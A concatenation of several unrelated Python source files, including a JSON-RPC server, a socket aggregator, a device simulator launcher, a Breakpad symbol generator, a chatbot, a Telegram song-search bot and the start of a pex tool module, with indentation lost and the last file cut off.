# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
aggregator.py | #!/usr/bin/env python
"""
Copyright (c) 2015-2018 The University of Tennessee and The University
of Tennessee Research Foundation. All rights
reserved."
This python script is the main script for the aggregator application.
@author Damien Genet
@email parsec-users@icl.utk.edu
"""
import socket
import sys, getopt
from threading import *
from time import sleep
import numpy
from iparam import iParam as iP
from data_handler import *
from aggregator_math_thread import *
from aggregator_simu_thread import *
from aggregator_gui_thread import *
from aggregator_database_thread import *
C = 64
def socket_binding(s, port_number):
try:
s.bind((socket.gethostname(), port_number))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
s.listen(C) # keeps C pending connections
def accepting(s, Data, params):
s.settimeout(5.)
while not params.stop_event.is_set():
try:
conn, addr = s.accept()
data = conn.recv(2048)
data = splitclean(data, ';')
tmp = data[1:]
params.debug(1,' >> --{0}--'.format(data))
if '1' in data[0]:
t = Thread(target=aggregator_simu_thread, args=(conn, addr, Data, params,tmp,))
params.appendSimu(t)
t.start()
if '2' in data[0]:
t = Thread(target=aggregator_gui_thread, args=(conn, addr, Data, params, tmp,))
params.appendGui(t)
t.start()
except socket.timeout as msg:
pass
def main(argv):
params = iP()
params.parseArgv(argv)
Data = HashData(params)
if params.db_name is not None:
sem = initSem(0)
t = Thread(target=aggregator_database_thread, args=(Data, params, sem))
t.start()
params.db = t
sem.acquire()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_binding(s, params.getPort());
print 'Listening on '+socket.gethostname()+' port ', params.getPort()
t = Thread(target=accepting, args=(s, Data, params))
params.accepting = t
t.start()
print 'hit a key to stop!'
st = raw_input(' > ')
params.stop()
params.join()
s.close()
if __name__ == "__main__":
main(sys.argv[:])
|
holideck.py | #!/usr/bin/python
#
"""
Holideck - Simulation and development enviornment for Holiday by MooresCloud
Homepage and documentation: http://dev.moorescloud.com/
Copyright (c) 2013, Mark Pesce.
License: MIT (see LICENSE for details)
"""
__author__ = 'Mark Pesce'
__version__ = '0.01-dev'
__license__ = 'MIT'
import sys, time
import ConfigParser
# Multiprocessing requires Python 2.6 or better
v = sys.version_info
if v[0] != 2 or v[1] < 6:
print("holideck requires Python 2.6.x or Python 2.7.x -- aborting")
sys.exit(0)
from multiprocessing import Process, Queue
import iotas.iotas
import simpype.simpype
if __name__ == '__main__':
# Read the config file for port numbers
try:
config = ConfigParser.SafeConfigParser()
config.read('holideck.config')
spp_port = int(config.get('simpype', 'port'))
iop_port = int(config.get('iotas', 'port'))
except:
spp_port = 8888 # If any error use default values
iop_port = 8080
# Create a Queue instance so the processes can share the datas
q = Queue()
# Start the simpype Process
spp = Process(target=simpype.simpype.run, kwargs={ 'port': spp_port, 'queue': q})
spp.start()
#time.sleep(1)
# Start the iotas Process and join it
iop = Process(target=iotas.iotas.run, kwargs={ 'port': iop_port, 'queue': q})
iop.start()
time.sleep(1)
print
print "Simulator should be available on http://localhost:%d" % spp_port
print "Web interface should be available on http://localhost:%d" % iop_port
# Now we wait. When we get a control-C, we exit -- hopefully.
while True:
try:
time.sleep(.1)
except KeyboardInterrupt:
print("\nTerminating simulator...")
iop.terminate()
spp.terminate()
print("Exiting.")
sys.exit(0)
|
generate_breakpad_symbols.py | #!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A tool to generate symbols for a binary suitable for breakpad.
Currently, the tool only supports Linux, Android, and Mac. Support for other
platforms is planned.
"""
import errno
import argparse
import os
import Queue
import re
import shutil
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
def GetCommandOutput(command):
"""Runs the command list, returning its output.
Prints the given command (which should be a list of one or more strings),
then runs it and returns its output (stdout) as a string.
From chromium_utils.
"""
devnull = open(os.devnull, 'w')
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
bufsize=1)
output = proc.communicate()[0]
return output
def GetDumpSymsBinary(build_dir=None):
"""Returns the path to the dump_syms binary."""
DUMP_SYMS = 'dump_syms'
dump_syms_bin = os.path.join(os.path.expanduser(build_dir), DUMP_SYMS)
if not os.access(dump_syms_bin, os.X_OK):
print 'Cannot find %s.' % DUMP_SYMS
sys.exit(1)
return dump_syms_bin
def FindBundlePart(full_path):
if full_path.endswith(('.dylib', '.framework', '.app')):
return os.path.basename(full_path)
elif full_path != '' and full_path != '/':
return FindBundlePart(os.path.dirname(full_path))
else:
return ''
def GetDSYMBundle(options, binary_path):
"""Finds the .dSYM bundle to the binary."""
if os.path.isabs(binary_path):
dsym_path = binary_path + '.dSYM'
if os.path.exists(dsym_path):
return dsym_path
filename = FindBundlePart(binary_path)
search_dirs = [options.build_dir, options.libchromiumcontent_dir]
if filename.endswith(('.dylib', '.framework', '.app')):
for directory in search_dirs:
dsym_path = os.path.join(directory, filename) + '.dSYM'
if os.path.exists(dsym_path):
return dsym_path
return binary_path
def GetSymbolPath(options, binary_path):
"""Finds the .dbg to the binary."""
filename = os.path.basename(binary_path)
dbg_path = os.path.join(options.libchromiumcontent_dir, filename) + '.dbg'
if os.path.exists(dbg_path):
return dbg_path
return binary_path
def Resolve(path, exe_path, loader_path, rpaths):
"""Resolve a dyld path.
@executable_path is replaced with |exe_path|
@loader_path is replaced with |loader_path|
@rpath is replaced with the first path in |rpaths| where the referenced file
is found
"""
path = path.replace('@loader_path', loader_path)
path = path.replace('@executable_path', exe_path)
if path.find('@rpath') != -1:
for rpath in rpaths:
new_path = Resolve(path.replace('@rpath', rpath), exe_path, loader_path,
[])
if os.access(new_path, os.F_OK):
return new_path
return ''
return path
def GetSharedLibraryDependenciesLinux(binary):
"""Return absolute paths to all shared library dependecies of the binary.
This implementation assumes that we're running on a Linux system."""
ldd = GetCommandOutput(['ldd', binary])
lib_re = re.compile('\t.* => (.+) \(.*\)$')
result = []
for line in ldd.splitlines():
m = lib_re.match(line)
if m:
result.append(os.path.realpath(m.group(1)))
return result
def GetSharedLibraryDependenciesMac(binary, exe_path):
"""Return absolute paths to all shared library dependecies of the binary.
This implementation assumes that we're running on a Mac system."""
loader_path = os.path.dirname(binary)
otool = GetCommandOutput(['otool', '-l', binary]).splitlines()
rpaths = []
for idx, line in enumerate(otool):
if line.find('cmd LC_RPATH') != -1:
m = re.match(' *path (.*) \(offset .*\)$', otool[idx+2])
rpaths.append(m.group(1))
otool = GetCommandOutput(['otool', '-L', binary]).splitlines()
lib_re = re.compile('\t(.*) \(compatibility .*\)$')
deps = []
for line in otool:
m = lib_re.match(line)
if m:
dep = Resolve(m.group(1), exe_path, loader_path, rpaths)
if dep:
deps.append(os.path.normpath(dep))
return deps
def GetSharedLibraryDependencies(options, binary, exe_path):
"""Return absolute paths to all shared library dependecies of the binary."""
deps = []
if sys.platform.startswith('linux'):
deps = GetSharedLibraryDependenciesLinux(binary)
elif sys.platform == 'darwin':
deps = GetSharedLibraryDependenciesMac(binary, exe_path)
else:
print "Platform not supported."
sys.exit(1)
result = []
build_dir = os.path.abspath(options.build_dir)
for dep in deps:
if (os.access(dep, os.F_OK)):
result.append(dep)
return result
def mkdir_p(path):
"""Simulates mkdir -p."""
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def GenerateSymbols(options, binaries):
"""Dumps the symbols of binary and places them in the given directory."""
queue = Queue.Queue()
print_lock = threading.Lock()
def _Worker():
while True:
binary = queue.get()
if options.verbose:
with print_lock:
print "Generating symbols for %s" % binary
if sys.platform == 'darwin':
binary = GetDSYMBundle(options, binary)
elif sys.platform == 'linux2':
binary = GetSymbolPath(options, binary)
syms = GetCommandOutput([GetDumpSymsBinary(options.build_dir), '-r', '-c',
binary])
module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-F]+) (.*)\n", syms)
output_path = os.path.join(options.symbols_dir, module_line.group(2),
module_line.group(1))
mkdir_p(output_path)
symbol_file = "%s.sym" % module_line.group(2)
f = open(os.path.join(output_path, symbol_file), 'w')
f.write(syms)
f.close()
queue.task_done()
for binary in binaries:
queue.put(binary)
for _ in range(options.jobs):
t = threading.Thread(target=_Worker)
t.daemon = True
t.start()
queue.join()
def main():
parser = argparse.ArgumentParser(description='Generate Breakpad Symbols Project')
parser.add_argument('--build-dir', required=True,
help='The build output directory.')
parser.add_argument('--symbols-dir', required=True,
help='The directory where to write the symbols file.')
parser.add_argument('--libchromiumcontent-dir', required=True,
help='The directory where libchromiumcontent is downloaded.')
parser.add_argument('--binary', action='append', required=True,
help='The path of the binary to generate symbols for.')
parser.add_argument('--clear', default=False, action='store_true',
help='Clear the symbols directory before writing new '
'symbols.')
parser.add_argument('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
type=int, help='Number of parallel tasks to run.')
parser.add_argument('-v', '--verbose', action='store_true',
help='Print verbose status output.')
options = parser.parse_args()
for bin_file in options.binary:
if not os.access(bin_file, os.X_OK):
print "Cannot find %s." % options.binary
return 1
if options.clear:
try:
shutil.rmtree(options.symbols_dir)
except:
pass
# Build the transitive closure of all dependencies.
binaries = set(options.binary)
queue = options.binary
while queue:
current_bin = queue.pop(0)
exe_path = os.path.dirname(current_bin)
deps = GetSharedLibraryDependencies(options, current_bin, exe_path)
new_deps = set(deps) - binaries
binaries |= new_deps
queue.extend(list(new_deps))
GenerateSymbols(options, binaries)
return 0
if '__main__' == __name__:
sys.exit(main())
|
brain.py | from random import randint
import random
from Levenshtein import distance
from os import listdir
import json
from threading import Thread
from time import sleep
import re
# Import interface for basic convo file
from utils import convo_reader
from message_statistics import MessageStats
from utils import sentiment
from utils import iograb
# Setup global objects
myIO = iograb.ClaraIO()
#myIO = iograb.WebIO()
# Config load
configFile = open('config.json')
raw_data = configFile.read()
data = json.loads(raw_data)
# Emotion load
emotionFile = open('emotions.json')
raw_data = emotionFile.read()
emotions = json.loads(raw_data)
emotionFile.close()
# Append all conversation response around distributed conversation files
# This allows one to "plug-in" new responses and have them centralized together
convo = []
convoDir = data['convo_dir']
convoFiles = listdir(data['convo_dir'])
for i in convoFiles:
if i.endswith('.json'):
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo += json.loads(raw_data)
elif i.endswith('.convo'):
# Process the loose file format
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo += convo_reader.convert_to_json(raw_data)
# Var Setup
VAR_REGISTRY = {}
def build_registry():
global VAR_REGISTRY
VAR_REGISTRY = {
"user_name": data['user']['name'],
"name": data['name'],
"response_count": len(convo),
"user_hobby": data['user']['hobby'],
"favorite_food": data['food'],
"happy_level": emotions['happy'],
"stress_level": emotions['stress'],
"animosity": emotions['animosity']
}
feelings = json.load(open('feelings.json'))
for i in feelings:
VAR_REGISTRY[i['name']] = i['val']
build_registry()
def punctuation_stripper(statement):
toRemove = ['.', '!', '?']
punctuate = None
for i in toRemove:
if not statement.find(i) == -1:
punctuate = i
statement = statement.strip(i)
return {"text": statement, "punctuation": punctuate}
def handle_modifiers(modifiers):
for i in modifiers:
try:
VAR_REGISTRY[i['name']] += i['val']
except:
doNothing = True
def calc_qualifiers(qualifier):
registryValue = VAR_REGISTRY[qualifier['name']]
try:
if registryValue > qualifier['$gt']:
return True
else:
return False
except:
# Not a greater than qualifier
doNothing = True
try:
if registryValue == qualifier['$eq']:
return True
else:
return False
except:
# Not an equal to qualifier
doNothing = True
try:
if registryValue < qualifier['$lt']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
# Legacy qualifier types
try:
if registryValue == qualifier['val']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
# if supplied info doesn't fit any of the above qualifier types reject
return False
# Pick a random option from supplied reply list using weights
def random_pick_weighted(reply_options):
weights = list(map(lambda e: e['weight'], reply_options))
indexes = list(range(0, len(reply_options)))
# Generates a list with a single entry containing a value randomly picked with proper weight
choices_list = random.choices(indexes, weights=weights, k=1)
picked_index = choices_list[0]
slimmed_reply = reply_options[picked_index]
return slimmed_reply
def get_response(input):
sentimentValues = sentiment.assess(input)
# Remove currently useless characters
stripped = punctuation_stripper(input)
input = stripped["text"]
punctuation = stripped["punctuation"]
possibilities = []
for i in convo:
for a in i['starters']:
val = distance(input, a)
if len(input)/(val+1) > 1.5:
reply_options = []
for b in i['replies']:
should_add = False
try:
to_test = b['qualifiers']
for z in to_test:
if calc_qualifiers(z):
should_add = True
else:
do_nothing = True
except:
should_add = True
if should_add:
to_add = {'text': b['text']}
try:
to_add['image'] = b['image']
except:
to_add['image'] = 'None'
try:
to_add['modifiers'] = b['modifiers']
except:
to_add['modifiers'] = []
try:
to_add['weight'] = b['weight']
except:
to_add['weight'] = 1
reply_options += [to_add]
slimmed_reply = random_pick_weighted(reply_options)
possibilities.append({
'val': val,
'response': slimmed_reply['text'],
'image': slimmed_reply['image'],
'weight': slimmed_reply['weight'],
'modifiers': slimmed_reply['modifiers']
})
min = 10000000000
response = 'None'
image = 'None'
modifiers = []
# print(possibilities)
for i in possibilities:
if i['val'] < min:
response = i['response']
image = i['image']
modifiers = i['modifiers']
min = i['val']
handle_modifiers(modifiers)
toReturn = {'message': response.format(**VAR_REGISTRY), 'image': image}
return toReturn
input_queue = []
def threaded_input():
while True:
if len(input_queue) == 0:
input_queue.append(myIO.get());
ticker = 0
events = json.load(open('events.json'))
for i in range(len(events)):
metric = events[i]['metric']
val = VAR_REGISTRY[metric]
events[i]['last'] = val
def event_check():
global ticker
ticker += 1
for i in range(len(events)):
metric = events[i]['metric']
val = VAR_REGISTRY[metric]
if events[i]['type'] == '$gt':
if val > events[i]['level'] and events[i]['last'] < val:
myIO.put(events[i]['response'])
elif events[i]['type'] == '$lt':
if val < events[i]['level'] and events[i]['last'] > val:
myIO.put(events[i]['response'])
events[i]['last'] = val
if __name__ == "__main__":
logFile = open('log.txt', 'a')
secureLogger = MessageStats("secure_log.json")
secureLogger.load_log()
myIO.put("Booting...")
ioThread = Thread(target = threaded_input)
myIO.put("{} online.".format(data['name']))
ioThread.start()
terminated = False
while not terminated:
event_check()
if len(input_queue) > 0:
statement = input_queue[0]
del input_queue[0]
response = get_response(statement.lower())
myIO.put(response['message'])
secureLogger.log_occurence(response['message'])
ender = '\n'
logFile.write('Q: ' + statement + ender)
if not response == None:
logFile.write('R: ' + response['message'] + ender)
else:
logFile.write('R: None' + ender)
if statement == "quit":
terminated = True
sleep(0.1)
emotionFile = open('emotions.json', 'w')
emotionFile.write(json.dumps(emotions))
emotionFile.close()
secureLogger.save_log()
|
app.py | import os
import logging
from queue import Queue
from threading import Thread, Timer
import requests
from flask import Flask, request
from telegram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton, Bot, Update
from telegram.ext import CommandHandler, MessageHandler, Filters, Dispatcher
import pygsheets
import json
import time
class User:
def __init__(self, chat_id, username, text):
self.chat_id = chat_id
self.username = username
self.text = text
self.switch = None
self.searching = False
self.last_msg = None
def change_text(self):
if self.text:
self.text = False
else:
self.text = True
class GSheetsManager:
def __init__(self):
self.client = pygsheets.authorize(service_account_env_var='GOOGLE_API')
self.sheet = self.client.open('Spivanik_songs').sheet1
self.data = self.sheet.get_all_records(empty_value='', head=1, majdim='ROWS', numericise_data=True)
self.timeout = 10.0
Timer(self.timeout, self.update_data).start()
def update_data(self):
self.data = self.sheet.get_all_records(empty_value='', head=1, majdim='ROWS', numericise_data=True)
Timer(self.timeout, self.update_data).start()
def get_parsed_categories(self):
parsed_categories = []
for row in self.data:
for category in row['Категорії'].split(';'):
if category not in parsed_categories:
parsed_categories.append(category)
return parsed_categories
def get_songs_for_category(self, category):
songs = []
for row in self.data:
if category in row['Категорії']:
songs.append(row)
return songs
def get_songs_for_search(self, key, position):
songs = []
for row in self.data:
try:
if key.lower() in row[position].lower():
songs.append(row)
except AttributeError: # Якщо раптом нема тексту у пісні, то не вийде пошукати
print("Нема тексту")
return songs
app = Flask(__name__)
TELEGRAM_TOKEN = os.environ["TELEGRAM_TOKEN"] # Telegram token
users = []
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
# /start
def start(update, context):
update.message.reply_text('Тебе вітає СБ!💙💛')
chat = update.message["chat"]
check_if_user_in_users(chat)
help(update, context)
del chat
# /about
def about(update, context):
update.message.reply_text('Це бот для пошуку українських пісень. Якщо маєш якість коментарі, то пиши @bohdanho')
# /help
def help(update, context):
update.message.reply_text('Вибирай потрібну команду:\n'
'/help - Список доступних команд\n'
'/about - Дізнатись більше про СБ\n'
'/settings - Змінити налаштування\n'
'/spiv - Пошук пісень')
# /settings
def settings(update, context):
chat_id = update.message["chat"]["id"]
user = find_user(chat_id)
user.searching = False
if user.text:
reply_text = "У тебе ввімкнуте отримання текстів"
reply_keyboard = [['Вимкнути'],
['Назад']]
else:
reply_text = "У тебе вимкнуте отримання текстів"
reply_keyboard = [['Ввімкнути'],
['Назад']]
msg_id = update.message.reply_text(reply_text, reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
# /spiv
def spiv(update, context):
reply_keyboard = [['Пошук пісні', 'Категорії'],
['В головне меню']]
msg_id = update.message.reply_text("Вибери метод пошуку: ", reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))["message_id"]
chat_id = update.message["chat"]["id"]
user = find_user(chat_id)
user.searching = False
user.last_msg = msg_id
# Пошук пісні з першої клавіатури за різними методами
def music_search(update, user):
music_search_keyboard = [['За назвою'], ['За виконавцем'], ['За текстом'], ['Назад до пошуку']]
msg_id = update.message.reply_text("Вибери за чим проводити пошук: ",
reply_markup=ReplyKeyboardMarkup(music_search_keyboard, one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
# Категорії з першої клавіатури
def categories(update, user):
parsed_categories = gsheets_manager.get_parsed_categories()
categories_keyboard = []
for item in parsed_categories:
categories_keyboard.append([item])
categories_keyboard.append(['Назад до пошуку'])
msg_id = update.message.reply_text("Вибери категорію: ",
reply_markup=ReplyKeyboardMarkup(categories_keyboard, one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
# Non-command message
def echo(update, context):
chat_id = update.message["chat"]["id"]
user = find_user(chat_id)
parsed_categories = gsheets_manager.get_parsed_categories() # Парсимо категорії для перевірки чи не є повідомлення із клавіатури з категоріями
# Зміна налаштувань
if update.message.text == "Вимкнути" or update.message.text == "Ввімкнути":
user.change_text()
delete_2_messages(update, user.last_msg)
elif update.message.text == "В головне меню":
# Про всяк випадок чистимо параметри пошуку юзера з switch_array, якщо він вирішив не шукати пісню і повернутись
user.searching = False
delete_2_messages(update, user.last_msg)
# Методи пошуку чи категорії
elif update.message.text == "Пошук пісні":
delete_2_messages(update, user.last_msg)
music_search(update, user)
elif update.message.text == "Категорії":
delete_2_messages(update, user.last_msg)
categories(update, user)
# Поверталки
elif update.message.text == 'Назад':
delete_2_messages(update, user.last_msg)
elif update.message.text == 'Назад до пошуку':
delete_2_messages(update, user.last_msg)
spiv(update, context)
elif update.message.text == 'Назад до категорій':
delete_2_messages(update, user.last_msg)
categories(update, user)
elif update.message.text == 'Назад до методів пошуку':
# Про всяк випадок чистимо параметри пошуку юзера з switch_array, якщо він вирішив не шукати пісню і повернутись
user.searching = False
delete_2_messages(update, user.last_msg)
music_search(update, user)
# Пошук за категоріями
elif update.message.text in parsed_categories:
delete_2_messages(update, user.last_msg)
parsed_songs = gsheets_manager.get_songs_for_category(update.message.text)
send_songs(update, parsed_songs, user.text)
msg_id = update.message.reply_text("Що далі? :)",
reply_markup=ReplyKeyboardMarkup([["Назад до категорій"], ["В головне меню"]],
one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
del parsed_songs
# Різні методи пошуку
elif update.message.text == 'За назвою':
delete_2_messages(update, user.last_msg)
msg_id = update.message.reply_text("Введи назву пісні: ",
reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]], one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
user.switch = 'Назва'
user.searching = True
elif update.message.text == 'За виконавцем':
delete_2_messages(update, user.last_msg)
msg_id = update.message.reply_text("Введи ім'я виконавця: ",
reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]],
one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
user.switch = 'Виконавець'
user.searching = True
elif update.message.text == 'За текстом':
delete_2_messages(update, user.last_msg)
msg_id = update.message.reply_text("Введи частину тексту: ",
reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]],
one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
user.switch = 'Текст'
user.searching = True
elif user.searching:
# Searching for songs in user-selected way with correlation to position in Songs table in DB
parsed_songs = gsheets_manager.get_songs_for_search(update.message.text, user.switch)
send_songs(update, parsed_songs, user.text)
msg_id = update.message.reply_text("Що далі? :)", reply_markup=ReplyKeyboardMarkup(
[["Назад до методів пошуку"], ["В головне меню"]],
one_time_keyboard=True))["message_id"]
user.last_msg = msg_id
user.searching = False
del parsed_songs # Deleting used data to avoid overfilling the RAM
else: # Answer on every other message
update.message.reply_text("Дякую, що написав, " + update['message']['chat']['first_name'] + ", ми обов'язково подумаємо над цим")
del parsed_categories # Deleting used data to avoid overfilling the RAM
# If error happens
def error(update, context):
logger.warning('Update "%s" caused error "%s"', update, context.error)
def check_if_user_in_users(chat):
global users
chat_id = chat["id"]
for user in users:
if user.chat_id == chat_id:
return 1
users.append(User(chat_id, chat["username"], True))
def find_user(chat_id):
global users
for user in users:
if user.chat_id == chat_id:
return user
# Компонуємо та відправляємо повідомлення з піснями, які ми витягнули з ДБ, вставлямо весь наявний контент
def send_songs(update, parsed_songs, text=None):
if parsed_songs:
for song in parsed_songs:
inline_keyboard = []
message_string = f'🏷 "{song["Назва"].upper()}"\n🎤 Виконавець: {song["Виконавець"]}\n💿 Жанр: {song["Категорії"]}\n'
# Чекаємо на наявність кожної характеристики в рядку
if song['Текст'] and text:
message_string += f"📜 Текст:\n{song['Текст']}"
if song['Акорди'] and "http" in song['Акорди']:
inline_keyboard.append([InlineKeyboardButton(text="Акорди 🎼", url=song['Акорди'])])
if song['Кліп'] and "http" in song['Кліп']:
inline_keyboard.append([InlineKeyboardButton(text="Кліп 🎬", url=song['Кліп'])])
if song['Таби'] and "http" in song['Таби']:
# inline_keyboard.append([InlineKeyboardButton(text="Таби 🎶", url=song['Таби'])])
bot.send_photo(chat_id=update.message['chat']['id'], photo=song['Таби'], caption=message_string, reply_markup=InlineKeyboardMarkup(inline_keyboard))
else:
update.message.reply_text(message_string, reply_markup=InlineKeyboardMarkup(inline_keyboard))
del inline_keyboard, message_string # Deleting used data to avoid overfilling the RAM
else:
update.message.reply_text("Нічого не знайдено :(")
del parsed_songs # Deleting used data to avoid overfilling the RAM
# Delete previous 2 messages after returning to the previous stage via custom keyboard
def delete_2_messages(update, bot_message_id=None):
chat_id = update["message"]["chat"]["id"]
last_message_id = update["message"]["message_id"]
if bot_message_id:
pass
else:
bot_message_id = update["message"]["message_id"] - 1
requests.get(f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/deleteMessage?chat_id={chat_id}&message_id={last_message_id}")
requests.get(f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/deleteMessage?chat_id={chat_id}&message_id={bot_message_id}")
@app.route('/send_message', methods=['GET', 'POST'])
def send_message():
if request.method == "POST":
message = json.loads(request.get_json(force=True))
for user in users:
bot.send_message(chat_id=user.chat_id, text=message["message"])
time.sleep(0.04)
# Receiving every update from telegram on webhook
@app.route(f'/{TELEGRAM_TOKEN}', methods=['GET', 'POST'])
def webhook():
if request.method == "POST":
# retrieve the message in JSON and then transform it to Telegram object
update = Update.de_json(request.get_json(force=True), bot=bot)
logger.info("Update received! " + update.message.text)
update_queue.put(update)
return "OK"
else:
return "BAD"
# Launching the Dispatcher
def launch_dispatcher():
# Different command handlers
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("about", about))
dp.add_handler(CommandHandler("help", help))
dp.add_handler(CommandHandler("spiv", spiv))
dp.add_handler(CommandHandler("settings", settings))
# On message
dp.add_handler(MessageHandler(Filters.text, echo))
# log all errors
dp.add_error_handler(error)
# start the dispatcher in different thread to process every update
thread = Thread(target=dp.start, name='dp')
thread.start()
# Starting the application
if __name__ == '__main__':
bot = Bot(TELEGRAM_TOKEN) # Creating the Bot object with TELEGRAM_TOKEN
update_queue = Queue() # Creating the Queue for the Dispatcher
dp = Dispatcher(bot, update_queue) # Creating the Dispatcher object
launch_dispatcher() # Preparing and launching the Dispatcher
bot.deleteWebhook(drop_pending_updates=True)
bot.setWebhook(f"https://sbbotapp.herokuapp.com/{TELEGRAM_TOKEN}") # Setting the WebHook for bot to receive updates
#bot.setWebhook(f"https://testflasksbbot.herokuapp.com/{TELEGRAM_TOKEN}") # Setting the WebHook for bot to receive updates
gsheets_manager = GSheetsManager()
app.run(host="0.0.0.0", port=int(os.environ.get('PORT', 5000)), threaded=True) # Launching the Flask app on appropriate IP and PORT
|
repository.py | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import functools
import logging
import os
import re
import shutil
import subprocess
from argparse import ArgumentParser, _SubParsersAction
from contextlib import contextmanager
from textwrap import dedent
from threading import Thread
from pex import dist_metadata
from pex.commands.command import Error, JsonMixin, Ok, OutputMixin, Result
from pex.common import (
DETERMINISTIC_DATETIME_TIMESTAMP,
pluralize,
safe_mkdir,
safe_mkdtemp,
safe_open,
)
from pex.compatibility import Queue
from pex.environment import PEXEnvironment
from pex.interpreter import PythonIdentity, PythonInterpreter, spawn_python_job
from pex.jobs import Retain, SpawnedJob, execute_parallel
from pex.pex import PEX
from pex.third_party.pkg_resources import Distribution
from pex.tools.command import PEXCommand
from pex.typing import TYPE_CHECKING, cast
if TYPE_CHECKING:
import attr # vendor:skip
from typing import Callable, IO, Iterable, Iterator, Text, Tuple
RepositoryFunc = Callable[["Repository", PEX], Result]
else:
from pex.third_party import attr
logger = logging.getLogger(__name__)
@attr.s(frozen=True)
class FindLinksRepo(object):
@classmethod
def serve(
cls,
interpreter, # type: PythonInterpreter
port, # type: int
directory, # type: str
):
# type: (...) -> FindLinksRepo
http_server_module = "SimpleHTTPServer" if interpreter.version[0] == 2 else "http.server"
cmd, http_server_process = interpreter.open_process(
# N.B.: Running Python in unbuffered mode here is critical to being able to read stdout.
args=["-u", "-m", http_server_module, str(port)],
cwd=directory,
stdout=subprocess.PIPE,
)
real_port = Queue() # type: Queue[int]
def read_data():
try:
data = http_server_process.stdout.readline()
